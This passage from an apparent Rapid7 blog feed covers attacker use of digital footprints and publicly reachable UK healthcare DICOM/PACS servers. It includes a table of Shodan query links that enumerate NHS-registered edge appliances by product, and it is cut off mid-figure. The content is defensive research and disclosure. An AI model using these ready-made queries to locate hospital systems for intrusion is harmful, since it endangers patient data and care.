data-sys-asset-uid="blt211adc3b079d8f80" data-sys-asset-filename="compromised-database-search-engine-exposes-leaked-credentials.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: A compromised database search engine exposes leaked credentials." data-sys-asset-alt="compromised-database-search-engine-exposes-leaked-credentials.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: A compromised database search engine exposes leaked credentials.</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76972e94eebe876e/69a04867d5b2d205c974fe23/citizenship-databases-exposed-on-cybercriminal-forum.png" height="796" alt="citizenship-databases-exposed-on-cybercriminal-forum.png" caption="Figure 3: Multiple citizenship databases exposed on a cybercriminal forum" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="citizenship-databases-exposed-on-cybercriminal-forum.png" width="1553" style="width: 1553px; height: 796px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76972e94eebe876e/69a04867d5b2d205c974fe23/citizenship-databases-exposed-on-cybercriminal-forum.png" data-sys-asset-uid="blt76972e94eebe876e" data-sys-asset-filename="citizenship-databases-exposed-on-cybercriminal-forum.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Multiple citizenship databases exposed on a cybercriminal forum" data-sys-asset-alt="citizenship-databases-exposed-on-cybercriminal-forum.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Multiple citizenship databases exposed on a cybercriminal forum</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actors increasingly leverage this layered digital footprint as a core component of their operational planning. While such exposure may not always constitute the initial access vector itself, it significantly influences attacker decision-making, targeting precision, and the likelihood of success. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Breach data and open-source intelligence are utilized to map organizational structures, identify privileged or high-value identities, correlate reused credentials, infer security controls, and tailor phishing or social engineering campaigns with high contextual credibility. In many cases, this intelligence determines which vulnerability, account, or trust relationship is exploited, rather than whether exploitable weaknesses exist. As a result, the boundary between “technical” and “human” attack vectors continues to erode. Infrastructure security remains necessary, but it is no longer sufficient in isolation. The effective attack surface now extends beyond networks and endpoints to encompass identity exposure, employee digital behavior, third-party data ecosystems, and long-lived data traces that persist outside traditional security tooling and governance models. </span></p><h2 style="direction: ltr;">What is digital footprint exposure?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A digital footprint refers to all the information about an organization and/or an individual that is publicly, semi-publicly, or commercially available online. This information is often scattered across numerous platforms, but aggregating it enables the creation of detailed, actionable profiles of individuals and institutions.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Typical elements of a digital footprint include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Corporate and personal email addresses</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Passwords and authentication data leaked through breaches</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Public social media profiles and historical activity</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Personally Identifiable Information (e.g., name, SSN, phone number, email address).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Employment history, job titles, role descriptions, and annual reports</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Online behavior, interests, affiliations, and routines</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Metadata collected and sold by third-party data brokers</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The acquisition of this data does not require hacking, system intrusion, or the deployment of malware. Instead, attackers collect, correlate, and exploit information that exists beyond the organization’s security perimeter, making it inherently unreachable by conventional security controls such as firewalls, EDR, or internal monitoring systems. Because these digital assets reside outside direct organizational ownership and technical control, they cannot be effectively protected by traditional defensive mechanisms. In this context, threat intelligence monitoring plays a critical role by providing visibility into external data exposure, tracking adversarial collection and misuse of such information, and enabling organizations to detect, assess, and respond to risks that would otherwise remain invisible to perimeter-based security architectures.</span></p><h2 style="direction: ltr;">Digital footprint exposure: A growing security threat</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The modern threat landscape no longer rewards attackers who are simply skilled at exploiting systems; it rewards those who are best at understanding people, relationships, and behavior. Publicly accessible data, semi-private platforms, and commercially available datasets collectively form a digital footprint that can be mapped, enriched, and weaponized well before any technical intrusion attempt. This exposure shifts the initial battleground away from firewalls and endpoints toward employees’ online presence and the organization’s external data shadow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations that continue to define their perimeter in terms of IP ranges, devices, or cloud assets are defending yesterday’s battlefield. In many cases, the first stage of compromise occurs months before an alert is raised, within public forums, social networks, breached datasets, and data broker platforms, entirely outside traditional security monitoring and response processes. Adversaries use this information to identify key personnel, ascertain internal structures, map trusted relationships, and assess security maturity without ever touching corporate infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Attackers collect specific external data to identify valid users, authentication systems, and internal dependencies. They extract employee names, roles, and corporate email formats from LinkedIn, conference materials, and public breach datasets. They identify authentication portals, VPN gateways, and cloud services using passive DNS records, Certificate Transparency logs, and internet scanning platforms such as Shodan or Censys. Public GitHub repositories and technical documentation may reveal internal domain names, API endpoints, identity providers, and technology stacks. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>These elements allow attackers to identify valid corporate accounts, target employees with privileged access, register impersonation domains that match internal naming conventions, and send phishing emails that reference real vendors, systems, or workflows. This preparation increases the likelihood of credential theft and unauthorized access because the attacker is targeting real users and real systems rather than relying on generic phishing or random scanning.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For employees, digital footprint exposure translates into personal risk that directly impacts corporate security. Leaked credentials, reused passwords, overshared professional information, or historical data breaches can be exploited to impersonate staff, coerce access, or establish credibility during pretexting operations. Senior leaders, IT staff, and individuals with privileged access are particularly vulnerable, as attackers can leverage publicly available information to craft convincing narratives that exploit trust and authority.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Uncontrolled exposure of employee information allows attackers to move from targeting individuals to compromising the organization. This enables them to identify employees with access to key systems, administrative privileges, or sensitive organizational platforms through public work profiles and data obtained from data breaches. They then test exposed credentials on corporate login portals, send phishing emails impersonating trusted internal or external entities, or attempt to intercept authentication codes by targeting exposed phone numbers. Once a single employee account is compromised, attackers can gain access to internal systems, escalate their privileges, and move laterally within the organization.</span></p><h2 style="direction: ltr;">Threat actor exploitation of digital footprints</h2><p style="direction: ltr;"><a href="https://www.rapid7.com/fundamentals/threat-actor/" target="_self"><span style='font-size: undefined;'>Threat actors</span></a><span style='font-size: undefined;'>, whether cybercriminal groups or state-sponsored operators, have always relied heavily on digital footprints in their operations. Publicly available information, leaked data, social media activity, and professional networks provide valuable insight into people, organizations, technologies, and trust relationships, making attacks more targeted and believable. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With the rise of AI-powered tools, this exploitation has intensified. What once required time-consuming manual research can now be automated, enriched, and scaled almost instantly. AI enables adversaries to turn fragmented online traces into compelling narratives, lures, and impersonations, significantly increasing the speed, precision, and overall impact of attack vectors driven by digital footprints.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Cybercriminals</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Cybercriminals typically exploit online exposure to establish rapid, monetizable intrusion paths without requiring deep internal access. Public profiles, leaked credentials, exposed servers, misconfigured cloud resources, and operational metadata are aggregated to identify where access already exists or can be obtained with minimal resistance. The focus is on converting exposed data directly into usable access, validating it quickly, and either exploiting or reselling it.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Tactical attack vectors derived from exposed digital footprints include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Leaked credential exploitation: </strong></span><span style='font-size: undefined;'>Abuse of credentials harvested from data breaches, stealer logs, and infostealer marketplaces, correlated with corporate email domains to gain unauthorized access to VPNs, SSO portals, cloud consoles, SaaS platforms, and legacy authentication endpoints</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Identity and account surface expansion: </strong></span><span style='font-size: undefined;'>Leveraging open professional and social network profiles to enumerate valid usernames, email address formats, job roles, seniority levels, and likely privilege tiers, enabling targeted credential testing and account takeover attempts</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Email signature and metadata harvesting: </strong></span><span style='font-size: undefined;'>Exploitation of email signatures, contact blocks, and publicly shared correspondence to identify internal naming conventions, phone extensions, third-party services, and technology stack indicators useful for impersonation and lateral access</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Document-driven reconnaissance:</strong></span><span style='font-size: undefined;'> Mining publicly exposed or leaked company documents (policies, PDFs, presentations, contracts, org. charts, etc.) to infer internal systems, authentication workflows, directory structures, cloud providers, and security controls</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Infrastructure targeting via exposure leakage: </strong></span><span style='font-size: undefined;'>Identification and exploitation of externally exposed servers, admin panels, APIs, and management interfaces through search engines, passive DNS, certificate transparency logs, and open indexing platforms</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Banner, certificate, and service fingerprinting: </strong></span><span style='font-size: undefined;'>Abuse of SSL/TLS certificates, HTTP headers, API responses, and service banners to fingerprint software versions, cloud services, authentication mechanisms, and unpatched or end-of-life systems</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Cloud asset exploitation: </strong></span><span style='font-size: undefined;'>Targeting publicly exposed storage buckets, orphaned cloud tenants, misconfigured IAM roles, stale API keys, and secrets discovered via open repositories, leaked configuration files, or documentation artifacts</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Access brokerage: </strong></span><span style='font-size: undefined;'>Enabling the validation, packaging, and resale of footprint-derived access (credentials, VPN sessions, cloud console access, shells) within cybercriminal marketplaces, based on assessed business impact and network reach</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Low-noise privilege escalation and lateral movement: </strong></span><span style='font-size: undefined;'>Exploitation of weak segmentation, excessive trust relationships, and overexposed directory or identity services inferred from public documentation, leaked internal diagrams, or misconfigured federation endpoints</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>State-Sponsored Actors</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>State-sponsored actors treat exposed digital footprints as long-term intelligence and access-enabling infrastructure. Voluntarily shared information, institutional transparency, technical disclosures, and accidental leaks are fused to build high-fidelity models of people, systems, and dependencies. These actors exploit exposure selectively, prioritizing vectors that support persistent access, intelligence collection, and operational survivability.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Tactical attack vectors derived from exposed digital footprints include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Identity and role mapping: </strong></span><span style='font-size: undefined;'>Use of social networks, publications, and organizational disclosures to identify privileged users, trust relationships, and lateral movement paths</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Credential and token reuse:</strong></span><span style='font-size: undefined;'> Reuse of leaked credentials, API keys, and tokens over long periods to regain access without new exploits or tooling</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Perimeter exploitation via transparency: </strong></span><span style='font-size: undefined;'>Targeting of publicly documented architectures, exposed technologies, and known integration points</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exposed service exploitation:</strong></span><span style='font-size: undefined;'> Compromise of internet-facing edge devices, management planes, update services, and CI/CD endpoints</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Supply-chain leverage: </strong></span><span style='font-size: undefined;'>Exploitation of disclosed vendors, SaaS platforms, and cloud dependencies as indirect access paths</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence through legacy exposure: </strong></span><span style='font-size: undefined;'>Abuse of forgotten accounts, test systems, and undercommissioned services still reachable externally</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Defensive evasion through disclosure awareness: </strong></span><span style='font-size: undefined;'>Tailoring operations based on publicly revealed security controls, tooling, and incident history</span></p></li></ul><h2 style="direction: ltr;">Advice for reducing digital footprint risk</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A structured technical approach is imperative to effectively reduce the risk of employees’ digital footprint exposure. It must aim to close identity security gaps, eliminate unknown external resources, and proactively monitor for leaks of sensitive data. First, organizations must strengthen their identity infrastructure by implementing phishing-resistant multi-factor authentication (MFA) for all privileged accounts and by integrating credential exposure monitoring directly at the identity provider (IdP) level to detect and block authentication attempts using compromised credentials.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition, </span><a href="https://www.rapid7.com/fundamentals/external-attack-surface-management-easm/" target="_blank"><span style='font-size: undefined;'>external attack surface management (EASM)</span></a><span style='font-size: undefined;'> must be implemented to identify and remediate internet-exposed, unknown, overlooked, or misconfigured resources, including servers, API endpoints, and storage resources that could expose configuration or sensitive organizational data. Digital risk protection (DRP) programs must prioritize monitoring the personally identifiable information (PII) of executives and board members, privileged credentials, and sensitive intellectual property on dark web forums, data breach datasets, and social media platforms to detect and disrupt adversary reconnaissance and targeting activities in the early stages of an attack lifecycle.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To reduce the risk of credential exposure, organizations should also continuously monitor for leaked or compromised credentials associated with corporate domains, limit the public disclosure of internal technical information, implement strong authentication methods resistant to credential theft, and respond rapidly when exposed accounts or infrastructure are identified.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It is equally important to consider employees as an integral part of the extended security perimeter. Technical controls must remain the primary means of mitigation. Measures such as strict access restrictions, centralized logging and analysis, and automated detection and response mechanisms should form the core of the defense. At the same time, it is critical to raise employee awareness about how their personal online activities and digital presence can directly affect the organization’s security posture.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations that implement these measures will see their digital footprint exposure transformed from a silent risk into a managed, measurable security domain, significantly reducing the likelihood of identity theft, targeted intrusions, and the leakage of critical intelligence.</span></p><h2 style="direction: ltr;">Conclusion<strong> </strong></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Today’s threat actors are no longer limited to exploiting technical vulnerabilities; they increasingly weaponize digital footprints as a primary enabler of their operations. For organizations, this means the attack surface extends well beyond networks and endpoints to include all externally exposed information. Any data available online about systems, infrastructure, or employees can be collected, correlated, and exploited to support reconnaissance, targeting, and intrusion planning, often without generating a single security alert or triggering traditional detection mechanisms. As a result, organizations that actively identify, monitor, and manage their external assets and digital footprint are better positioned to detect exposure early, reduce opportunities for adversaries, and strengthen their overall security posture before threats materialize.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Read the Rapid7 Labs threat report “</strong></span><a href="https://www.rapid7.com/lp/executive-digital-footprints-threat-report/" target="_blank"><span style='font-size: undefined;'><strong>Executives’ Digital Footprints: The Overlooked Corporate Vulnerability</strong></span></a><span style='font-size: undefined;'><strong>” for more insights and detailed recommendations.</strong></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-data-breach-digital-footprints-strategic-cyber-risk-report</link>
      <guid isPermaLink="false">blt1e6bda08a0aeb3c4</guid>
      <category><![CDATA[Social Engineering]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Jeremy Makowski]]></dc:creator>
      <pubDate>Thu, 26 Feb 2026 14:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt64b644da393aaf3c/69a0496b6da80336bb7b711b/promo-threat-report-executives-digital-footprint.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Your MRI is Online: The Hidden Risks of Exposed DICOM Servers in UK Healthcare]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Hospitals invest heavily in physical security: Clinical areas are access-controlled, sensitive rooms are locked, and patient records are governed by strict handling procedures. Network exposure does not always receive the same level of scrutiny.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs identified more than 30 UK-based systems responding to DICOM requests over Port 104, the default port used for medical imaging traffic. These systems were reachable from the public internet at the time of observation. Project Sonar was used to confirm service responsiveness only; no attempt was made to access patient records or exploit the systems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When Port 104 is reachable from outside trusted networks without VPN restriction or encryption, the imaging service can be detected through routine internet scanning. This type of exposure matters because protocols like DICOM were developed for use within protected clinical environments where network access is already controlled. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Research into medical imaging infrastructure has found that when security best practices are not implemented, imaging systems and their acquisition gateways are placed on networks in ways that expose them to cybercriminal discovery. In one study of publicly accessible PACS (picture archiving and communication systems) servers, researchers reported that systems using default configurations or lacking appropriate network controls responded to internet scans and contained metadata such as patient identifiers, and the lack of basic protocol safeguards made them susceptible to data reconstruction and modification.</span></p><h2 style="direction: ltr;">Why should DICOM not be internet-facing?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>DICOM, or digital imaging and communications in medicine, is the international standard used to format, store, and transmit medical imaging data. It governs both the image itself and associated metadata, which can include patient identifiers, study details, acquisition parameters, and device information. Imaging modalities such as CT scanners and MRI machines use DICOM to send studies to Picture Archiving and Communication Systems (PACS), where images are stored and later retrieved by radiologists and clinicians.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>DICOM operates at the application layer. Port 104 is the traditional default port associated with DICOM services, but the protocol is not limited to that port. PACS systems and imaging services may also communicate over web ports such as 80 or 443, and in some cases expose web-based or administrative interfaces over additional ports. In our broader research, we identified more than 15 PACS devices that were externally reachable, including systems accessible over standard web ports.</span></p><p>⠀</p><figure style="margin: 0; text-align: center"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1933ad177a53b96f/699f23443b580eba7a24a94e/clarify-pacs-login-screen.png" alt="clarify-pacs-login-screen.png" caption="Figure 1: Clarify – PACS admin login portal." height="335" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="clarify-pacs-login-screen.png" width="365" style="text-align: center; width: 365px; height: 335px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1933ad177a53b96f/699f23443b580eba7a24a94e/clarify-pacs-login-screen.png" data-sys-asset-uid="blt1933ad177a53b96f" data-sys-asset-filename="clarify-pacs-login-screen.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Clarify – PACS admin login portal." data-sys-asset-alt="clarify-pacs-login-screen.png" data-sys-asset-position="center" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Clarify – PACS admin login portal.</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>In standard hospital deployments, DICOM services are intended to operate within segmented and trusted clinical networks. The protocol historically assumed that the surrounding network would provide access control and protection. When imaging systems or PACS services are reachable from public IP space, whether over Port 104 or web-based interfaces, they may respond to protocol negotiation or HTTP requests and disclose service-level information. In some configurations, metadata or system details can be retrieved without strong authentication controls.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That condition does not necessarily imply full access to imaging archives. It does mean that clinical infrastructure is externally discoverable and capable of interaction beyond its intended network boundary. The risk arises from that exposure, particularly when it is unintended or unmonitored.</span></p><h2 style="direction: ltr;">Exposed DICOM servers in the UK: What Rapid7 Labs found</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Using </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/research/project-sonar" data-sys-entry-uid="blt8a72e0dee56edd04" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>Project Sonar</span></a><span style='font-size: undefined;'>, Rapid7’s internet-wide exposure monitoring framework, we identified more than 30 UK-based healthcare systems responding to DICOM-related requests, including services associated with Port 104. The exposure was not limited to that port. Additional PACS and related healthcare systems were observed to be reachable over web ports such as 80 and 443, with more than 15 PACS devices directly accessible from public IP space.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt74d5b3f6408e68f6/699f237fb009386b1a8334c4/DICOM-medical-devices-exposed-UK-map.png" alt="DICOM-medical-devices-exposed-UK-map.png" caption="Figure 2: UK-based exposed Healthcare systems to the Internet." height="535" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DICOM-medical-devices-exposed-UK-map.png" width="467" style="width: 467px; height: 535px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt74d5b3f6408e68f6/699f237fb009386b1a8334c4/DICOM-medical-devices-exposed-UK-map.png" data-sys-asset-uid="blt74d5b3f6408e68f6" data-sys-asset-filename="DICOM-medical-devices-exposed-UK-map.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: UK-based exposed Healthcare systems to the Internet." data-sys-asset-alt="DICOM-medical-devices-exposed-UK-map.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: UK-based exposed Healthcare systems to the Internet.</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>This methodology does not exploit systems or access patient records. It confirms whether a service is reachable and actively responding.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For healthcare organizations navigating increased regulatory scrutiny and rising cyber threats, this kind of medical device exposure is unnecessary risk.</span></p><h2 style="direction: ltr;">The cybersecurity risks of exposed medical imaging systems</h2><p style="direction: ltr;"><span style='font-size: undefined;'>When a DICOM server is exposed to the internet, and the risk extends beyond technical misconfiguration, it introduces three primary threat categories:</span></p><h3 style="direction: ltr;">Patient data exposure and healthcare identity theft</h3><p style="direction: ltr;"><span style='font-size: undefined;'>DICOM files typically contain structured metadata fields, which may include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Patient name.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Date of birth.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Study identifiers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Referring clinician information.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>If a system allows metadata queries without authentication or encryption, those identifiers may be retrievable. Healthcare data retains long-term value because it cannot be reissued in the way payment credentials can.</span></p><h3 style="direction: ltr;">Medical image manipulation and clinical integrity risks</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Imaging workflows depend on trusted transmission between modalities, PACS servers, and diagnostic workstations. Research has shown that medical images can be altered using machine learning techniques under controlled conditions. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Exploitation requires access and technical capability, but exposure beyond intended network boundaries increases the potential attack surface. Clinical confidence depends on assurance that imaging data has not been modified in transit.</span></p><h3 style="direction: ltr;">Ransomware entry points via PACS and imaging systems</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Medical imaging systems like DICOM connect to PACS servers. If an exposed DICOM service provides a foothold, attackers may attempt lateral movement inside the network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An exposed PACS server can quickly become operational ground zero - delaying procedures, disrupting diagnostics, and impacting patient care. As healthcare continues to face ransomware targeting across the UK and EU, edge systems and externally visible services are often initial access points.</span></p><h2 style="direction: ltr;">UK healthcare attack surface exposure: DICOM is part of a wider pattern</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The exposure of 30+ DICOM systems is concerning. But it is not isolated. A broader review of UK healthcare-associated IP space shows externally visible infrastructure including:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Cisco edge devices.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>BigIP appliances.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point firewalls.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix NetScaler instances.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Endpoint Manager Mobile.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SSL VPN portals.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Search for NHS registered names and filter on UK/GB:</strong></span></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>System Tech</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Count</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22ciscoSystems%22"><span style='font-size: undefined;'>ciscoSystems</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>153</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22BigIP%22"><span style='font-size: undefined;'>BigIP</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>36</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Check+Point+Firewall%22"><span style='font-size: undefined;'>Check Point Firewall</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>30</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Check+Point+SVN+foundation+httpd%22"><span style='font-size: undefined;'>Check Point SVN foundation httpd</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>26</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Cisco+ASA+SSL+VPN%22"><span style='font-size: undefined;'>Cisco ASA SSL VPN</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Connectra+Check+Point+Web+Security+httpd%22"><span style='font-size: undefined;'>Connectra Check Point Web Security httpd</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Citrix+Netscaler%22"><span style='font-size: undefined;'>Citrix Netscaler</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Ivanti+Endpoint+Manager+Mobile+%28EPMM%29%22"><span style='font-size: undefined;'>Ivanti Endpoint Manager Mobile (EPMM)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Cisco+IOS+http+config%22"><span style='font-size: undefined;'>Cisco IOS http config</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Fortinet+FortiGate%22"><span style='font-size: undefined;'>Fortinet FortiGate</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Fortinet+FortiGate-100E%22"><span style='font-size: undefined;'>Fortinet FortiGate-100E</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Fortinet+FortiGate-40F%22"><span style='font-size: undefined;'>Fortinet FortiGate-40F</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22SonicWall%22"><span style='font-size: undefined;'>SonicWall</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.shodan.io/search?query=country%3A%22GB%22+org%3A%22NHS%22+product%3A%22Sophos+SSL+VPN+User+Portal%22"><span style='font-size: undefined;'>Sophos SSL VPN User Portal</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td></tr></tbody></table><p><em>Table 1: </em><span style='font-size: undefined;'><em>Externally visible technologies identified across UK healthcare-associated IP space.</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>These technologies are standard components of modern IT environments. The concern arises when exposure is unintended, unmonitored, or paired with delayed remediation. Public reporting in 2025 shows that ransomware groups continue to target healthcare following disclosure of vulnerabilities in edge appliances and remote access technologies. In several documented cases, exploitation occurred within days of vulnerability publication.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When more than 30 imaging systems are externally reachable, the underlying issue is unlikely to be a single isolated configuration error. It suggests incomplete visibility into which services are accessible from outside the organisation at any given moment.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: 